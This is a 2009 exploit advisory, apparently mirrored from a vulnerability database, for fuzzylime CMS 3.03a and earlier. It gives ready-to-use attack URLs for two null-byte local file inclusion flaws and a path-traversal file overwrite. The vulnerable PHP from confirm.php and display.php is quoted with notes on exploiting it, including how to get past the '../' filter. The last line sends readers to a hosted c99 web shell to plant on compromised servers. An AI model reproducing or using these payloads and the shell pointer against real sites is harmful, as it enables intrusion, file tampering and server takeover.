Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22065
HistoryJun 22, 2009 - 12:00 a.m.

fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC

2009-06-2200:00:00
vulners.com
13

±-----------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
±----------±-----------------------------------------------------------+
| by staker |
±----------±--------------------+
Author : xhaxkerx
Special Thankz : yasin
site : http://www.c99.mobi
±--------------------------------+

[1][LFI]

http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }

Vulnerable code: confirm.php (local file inclusion mq=off)

  1. <?

  2. @extract($HTTP_GET_VARS); <-------- {1}

  3. @extract($_GET); <----------^

  4. elseif(isset($e)) { <------- {2}

  5.   $filename = &quot;code/mailing/$list.inc.php&quot;; &lt;------- {3}
    
  6.    @include $filename; &lt;------- {4}
    

  1. extract() allows to overwrite any not-defined variable via get
    therefore it works regardless of register_globals settings.

  2. $e is a variable not defined,therefore become $_GET['e']

  3. $list is a variable not defined,therefore become $_GET['list']

  4. $filename contains $list variable that will be required


[2][LFI]

http://[target]/[path]/code/display.php?template= {file + nullbyte}

Vulnerable code: display.php (local file inclusion mq=0 & reg=on)

  1. if($_GET['print'] != "1") include "templates/${template}_f.php";

[3][LFC]

http://[target]/[path]/code/display.php?usecache=1&s=…//settings
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off)

Vulnerable code: display.php (local file corruption register_gl=1)

  1. <?
  2. $s = $_GET[s];
  3. $p = $_GET[p];
  4. $s = str_replace("…/", "", $s); <---------- {1}
  5. $p = str_replace("…/", "", $p);
  6. $cachefile = "cache/${s}${p}$GET[m]$GET[c]$GET[t]$GET[u]$_GET[print].cache.htm"; <---- {2}
  7. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) { <— {3}
  8.        if&#40;$handle = fopen&#40;$cachefile, &#39;w&#39;&#41;&#41; { // Create the cache file &lt;-------- {4}
    
  9.                $output = ob_get_contents&#40;&#41;;
    
  10.                fputs&#40;$handle, $output&#41;; 
    
  11.                fclose&#40;$handle&#41;; 
    
  12.        } 
    
  13. }

  1. you have to use …// to change directory because of 1st point. so
    …// will be …/
  2. $cachefile contains $s variable
  3. if $usecache == 1 we will go ahead
  4. you will overwrite a file typing the name via $s variable.

if you need shell http://www.c99.mobi/c99.txt

[x] http://www.youtube.com/watch?v=h3DQmJOkSY0